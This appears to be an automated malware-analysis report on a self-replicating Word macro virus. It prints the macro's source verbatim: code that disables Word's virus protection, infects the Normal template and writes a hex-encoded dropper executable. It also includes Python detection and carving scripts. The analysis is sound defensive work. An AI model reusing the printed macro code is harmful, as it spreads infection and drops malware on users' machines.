Verdict: MALICIOUS
Risk Score: 180

Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1105 Ingress Tool Transfer
The critical OLE_VBA_SHELL heuristic fires because the VBA code calls Shell(). The AutoClose macro runs when the document is closed. It first switches off Word's macro virus warning (Options.VirusProtection = (0 - 0), i.e. False, written as an expression to avoid a literal match) and copies its own code module between the active document and the Normal template: whichever of the two has no code becomes the host, the module is exported to c:\kloop.dat and re-imported with AddFromFile, and the infected document is saved in place. That is classic Word macro-virus self-replication, not a one-shot stager. The macro then writes a script for the MS-DOS DEBUG.EXE to C:\KLOOP.DBG: an N line naming the output file C:\KLOOP.EX and E lines that enter the bytes of a Win32 executable sixteen at a time (MZ header, the "This program cannot be run in DOS mode" stub, a PE header with three sections named UPX0, UPX1 and UPX2, i.e. a UPX-packed binary). The payload therefore travels inside the document as hex text rather than being fetched from the network, so this is a dropper rather than a downloader. The preview is cut off before the Shell() call, but the Kill of C:\KLOOP.BAT and the Dir check for an existing C:\KLOOP.EXE indicate that the rest of the macro feeds the script to DEBUG, produces c:\kloop.exe and executes it.
Heuristics (5)

| Heuristic | Severity | ID | Description |
|---|---|---|---|
| VBA macros detected (3 related findings) | medium | OLE_VBA_MACROS | Document contains VBA macro code |
| Shell() call in VBA | critical | OLE_VBA_SHELL | Shell() call in VBA |
| Auto_Close macro | high | OLE_VBA_AUTOCLOSE | Auto_Close macro |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. |
| Legacy WordBasic auto-exec macro marker | medium | OLE_LEGACY_WORDBASIC_AUTOEXEC | OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. |
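The heuristic IDs above are the analyzer's own. As an added example, not the analyzer's code, the Python below reproduces the reasoning behind them as a small rule set run over recovered VBA source: an auto-exec procedure name, tampering with Options.VirusProtection (the `(0 - 0)` is False spelled out to dodge a literal match, so the rule keys on the property assignment instead), copying a code module through VBProject.VBComponents (Normal template infection), a printed DEBUG script, a file opened for output and a Shell() call. Both inputs are constructed: an excerpt of the macro taken from the preview on this page and a harmless formatting macro. The indicator names, weights and threshold are this example's choices, not the report's scoring.

```python
import re

# Constructed inputs: an excerpt of the macro from the preview on this page
# (the preview stops before the Shell() call, so that indicator will not fire
# here) and a harmless formatting macro for comparison.
KLOOP_EXCERPT = r'''Sub AutoClose()
On Error Resume Next
Options.VirusProtection = (0 - 0)
nt = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines
ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\kloop.dat"
host.codemodule.AddFromFile ("c:\kloop.dat")
Kill "C:\KLOOP.DBG"
Open "C:\KLOOP.DBG" For Output As 5
Print #5, "N C:\KLOOP.EX"
Print #5, "E 0100 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00"
'''

BENIGN_MACRO = r'''Sub FormatReport()
    Selection.Font.Bold = True
    ActiveDocument.Save
End Sub
'''

# (indicator name, pattern, weight). Names and weights are this example's choices.
INDICATORS = [
    # procedure names Word runs on its own (document open/close/new, startup)
    ("auto_exec", re.compile(
        r"^\s*(?:Public\s+|Private\s+)?Sub\s+(?:Auto(?:Open|Close|Exec|New|Exit)"
        r"|Document_(?:Open|Close|New))\b", re.I | re.M), 2),
    # any assignment to the macro virus warning switch, whatever the value looks like
    ("av_tamper", re.compile(r"Options\.VirusProtection\s*=", re.I), 3),
    # exporting a code module or importing one into a code module: self-replication
    ("self_replicate", re.compile(
        r"(?:VBProject\.VBComponents\b.*\.Export\b|codemodule\.AddFromFile\b)", re.I), 3),
    # DEBUG.EXE script literals: an N line naming a file, or an E line starting at MZ
    ("debug_script", re.compile(r'"N\s+[A-Z]:\\[^"]*"|"E\s+0100\s+4D\s+5A\b', re.I), 4),
    ("file_drop", re.compile(r'\bOpen\s+"[^"]*"\s+For\s+Output\b', re.I), 1),
    ("shell", re.compile(r"\bShell\s*\(", re.I), 2),
]


def score_macro(source, threshold=6):
    """Run every indicator over the VBA text and sum the weights of those that hit."""
    hits = [name for name, pattern, _ in INDICATORS if pattern.search(source)]
    score = sum(weight for name, _, weight in INDICATORS if name in hits)
    return {"score": score, "hits": hits,
            "verdict": "malicious" if score >= threshold else "clean"}


if __name__ == "__main__":
    print(score_macro(KLOOP_EXCERPT))
    print(score_macro(BENIGN_MACRO))
```

Keying av_tamper on the assignment rather than on `= False` or `= 0` is the point: old macro viruses routinely hide the value behind an expression, and no legitimate document macro has a reason to touch that option at all.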
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 75537 bytes | 13f8af63dd9ac9f7a4e584e409d71c15190f41829767e4714b2d8552b5f7dcaa |

Preview: first 1,000 lines of the extracted script, reproduced verbatim (the dump is truncated below).
```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoClose()
On Error Resume Next
Options.VirusProtection = (0 - 0)
Options.SaveNormalPrompt = (0 - 0)
Options.ConfirmConversions = (0 - 0)
ad = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.CountOfLines
nt = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines
If nt = 0 Then
Set host = NormalTemplate.VBProject.VBComponents.Item(1)
ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\kloop.dat"
End If
If ad = 0 Then Set host = ActiveDocument.VBProject.VBComponents.Item(1)
If nt > 0 And ad > 0 Then GoTo err
host.codemodule.AddFromFile ("c:\kloop.dat")
With host.codemodule
For x = 1 To 4
.deletelines 1
Next x
End With
err:
If nt <> 0 And ad = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
Kill "C:\KLOOP.DBG"
Kill "C:\KLOOP.EX"
Kill "C:\KLOOP.BAT"
If Dir("C:\KLOOP.EXE") <> "" Then GoTo NODROP
Open "C:\KLOOP.DBG" For Output As 5
Print #5, "N C:\KLOOP.EX"
Print #5, "E 0100 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00"
Print #5, "E 0110 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00"
Print #5, "E 0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0130 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00"
Print #5, "E 0140 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68"
Print #5, "E 0150 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F"
Print #5, "E 0160 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20"
Print #5, "E 0170 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00"
Print #5, "E 0180 E7 01 6D 38 A3 60 03 6B A3 60 03 6B A3 60 03 6B"
Print #5, "E 0190 A3 60 02 6B 91 60 03 6B C1 7F 10 6B A0 60 03 6B"
Print #5, "E 01A0 4B 7F 08 6B A2 60 03 6B 4B 7F 09 6B E1 60 03 6B"
Print #5, "E 01B0 20 7C 0D 6B AF 60 03 6B 5C 40 09 6B A2 60 03 6B"
Print #5, "E 01C0 52 69 63 68 A3 60 03 6B 00 00 00 00 00 00 00 00"
Print #5, "E 01D0 50 45 00 00 4C 01 03 00 BE 2B 74 39 00 00 00 00"
Print #5, "E 01E0 00 00 00 00 E0 00 0F 01 0B 01 06 00 00 40 00 00"
Print #5, "E 01F0 00 10 00 00 00 70 00 00 80 BB 00 00 00 80 00 00"
Print #5, "E 0200 00 C0 00 00 00 00 40 00 00 10 00 00 00 02 00 00"
Print #5, "E 0210 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00"
Print #5, "E 0220 00 D0 00 00 00 10 00 00 00 00 00 00 03 00 00 00"
Print #5, "E 0230 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00"
Print #5, "E 0240 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0250 00 C0 00 00 60 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0270 60 C0 00 00 14 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 02A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 02B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 02C0 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00"
Print #5, "E 02D0 00 70 00 00 00 10 00 00 00 00 00 00 00 04 00 00"
Print #5, "E 02E0 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 E0"
Print #5, "E 02F0 55 50 58 31 00 00 00 00 00 40 00 00 00 80 00 00"
Print #5, "E 0300 00 3E 00 00 00 04 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0310 00 00 00 00 40 00 00 E0 55 50 58 32 00 00 00 00"
Print #5, "E 0320 00 10 00 00 00 C0 00 00 00 02 00 00 00 42 00 00"
Print #5, "E 0330 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0"
Print #5, "E 0340 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0350 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0360 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0370 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0380 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E 0390 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #5, "E
```
... (truncated)
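Reconstructing the dropped binary from the macro, as an added example that is not part of this report or of olevba. The Print #5 lines form a script for the MS-DOS DEBUG.EXE: N names the output file and each E line enters sixteen bytes at an address. DEBUG loads and writes files starting at offset 0100h, so "E 0100" is file offset 0, and its W command refuses to write files with an .EXE extension, which is why the script names the output C:\KLOOP.EX and the macro later works with C:\KLOOP.EXE. The Python below pulls the string literals back out of the VBA, reassembles the bytes in address order and walks the MZ and PE headers far enough to read the section table. The embedded input is a constructed subset of the dump: the N line and the E lines 0100 through 0330 copied from the preview above (all-zero lines left out), so the assembled image is only the first 0x240 bytes and expected_file_size is derived from the section table, not measured. The function names are this example's own.

```python
import re
import struct

# Constructed input: the DEBUG.EXE script the macro prints into C:\KLOOP.DBG,
# copied from the preview above (N line and E lines 0100-0330). The all-zero
# lines 0120, 0260 and 0280-02B0 are left out; the assembler zero-fills the gaps.
KLOOP_DBG = r"""N C:\KLOOP.EX
E 0100 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00
E 0110 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
E 0130 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00
E 0140 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68
E 0150 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F
E 0160 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20
E 0170 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00
E 0180 E7 01 6D 38 A3 60 03 6B A3 60 03 6B A3 60 03 6B
E 0190 A3 60 02 6B 91 60 03 6B C1 7F 10 6B A0 60 03 6B
E 01A0 4B 7F 08 6B A2 60 03 6B 4B 7F 09 6B E1 60 03 6B
E 01B0 20 7C 0D 6B AF 60 03 6B 5C 40 09 6B A2 60 03 6B
E 01C0 52 69 63 68 A3 60 03 6B 00 00 00 00 00 00 00 00
E 01D0 50 45 00 00 4C 01 03 00 BE 2B 74 39 00 00 00 00
E 01E0 00 00 00 00 E0 00 0F 01 0B 01 06 00 00 40 00 00
E 01F0 00 10 00 00 00 70 00 00 80 BB 00 00 00 80 00 00
E 0200 00 C0 00 00 00 00 40 00 00 10 00 00 00 02 00 00
E 0210 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00
E 0220 00 D0 00 00 00 10 00 00 00 00 00 00 03 00 00 00
E 0230 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00
E 0240 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00
E 0250 00 C0 00 00 60 00 00 00 00 00 00 00 00 00 00 00
E 0270 60 C0 00 00 14 00 00 00 00 00 00 00 00 00 00 00
E 02C0 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00
E 02D0 00 70 00 00 00 10 00 00 00 00 00 00 00 04 00 00
E 02E0 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 E0
E 02F0 55 50 58 31 00 00 00 00 00 40 00 00 00 80 00 00
E 0300 00 3E 00 00 00 04 00 00 00 00 00 00 00 00 00 00
E 0310 00 00 00 00 40 00 00 E0 55 50 58 32 00 00 00 00
E 0320 00 10 00 00 00 C0 00 00 00 02 00 00 00 42 00 00
E 0330 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0
"""

PRINT_LITERAL = re.compile(r'Print\s*#\d+\s*,\s*"([^"]*)"', re.I)
E_LINE = re.compile(r"^E\s+([0-9A-F]{4})((?:\s+[0-9A-F]{2})+)\s*$", re.I)
LOAD_OFFSET = 0x100  # DEBUG reads and writes files from CS:0100, so "E 0100" is file offset 0


def debug_script_from_vba(vba_source):
    """Recover the .DBG script from macros.bas: the literal of every Print #n, "..." line."""
    return "\n".join(m.group(1) for m in PRINT_LITERAL.finditer(vba_source))


def assemble_debug_script(script):
    """Rebuild the file a DEBUG N/E script would write. Returns (output name, bytes)."""
    name, image = None, bytearray()
    for line in script.splitlines():
        line = line.strip()
        if line[:2].upper() == "N ":
            name = line[2:].strip()
            continue
        m = E_LINE.match(line)
        if not m:
            continue  # RCX/W/Q commands and the truncated last line carry no bytes
        offset = int(m.group(1), 16) - LOAD_OFFSET
        if offset < 0:
            raise ValueError("E address below load offset: " + line)
        data = bytes.fromhex(m.group(2))
        end = offset + len(data)
        if end > len(image):
            image.extend(b"\0" * (end - len(image)))  # zero-fill any gap
        image[offset:end] = data
    return name, bytes(image)


def describe_pe(image):
    """Minimal PE32 header walk, enough to classify the dropped file without running it."""
    if image[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    machine, nsections = struct.unpack_from("<HH", image, e_lfanew + 4)
    opt_size = struct.unpack_from("<H", image, e_lfanew + 20)[0]
    opt = e_lfanew + 24  # optional header follows the 4-byte signature and 20-byte COFF header
    magic = struct.unpack_from("<H", image, opt)[0]
    entry = struct.unpack_from("<I", image, opt + 16)[0]
    image_base = struct.unpack_from("<I", image, opt + 28)[0]
    sections = []
    for i in range(nsections):
        hdr = opt + opt_size + 40 * i  # 40-byte IMAGE_SECTION_HEADER entries
        name = image[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", image, hdr + 8)
        sections.append({"name": name, "va": va, "vsize": vsize,
                         "raw_ptr": raw_ptr, "raw_size": raw_size})
    return {
        "e_lfanew": e_lfanew, "machine": machine, "pe32": magic == 0x10B,
        "image_base": image_base, "entry_point": entry, "sections": sections,
        "upx_sections": bool(sections) and all(s["name"].startswith("UPX") for s in sections),
        # end of the last section's raw data: the size of the file once every E line is in
        "expected_file_size": max(s["raw_ptr"] + s["raw_size"] for s in sections),
    }


def carve(script):
    """Assemble a DEBUG script and describe the PE it produces."""
    name, image = assemble_debug_script(script)
    return name, image, describe_pe(image)
```

Run on the full macros.bas (`carve(debug_script_from_vba(open("macros.bas").read()))`) the same code yields the complete dropped file, which can then be hashed and unpacked offline. On the subset above it reports machine 0x14C (i386), a PE32 image based at 0x400000 with its entry point at 0xBB80 inside UPX1, and a section table whose raw data ends at 0x4400, so the complete KLOOP.EX is 17,408 bytes.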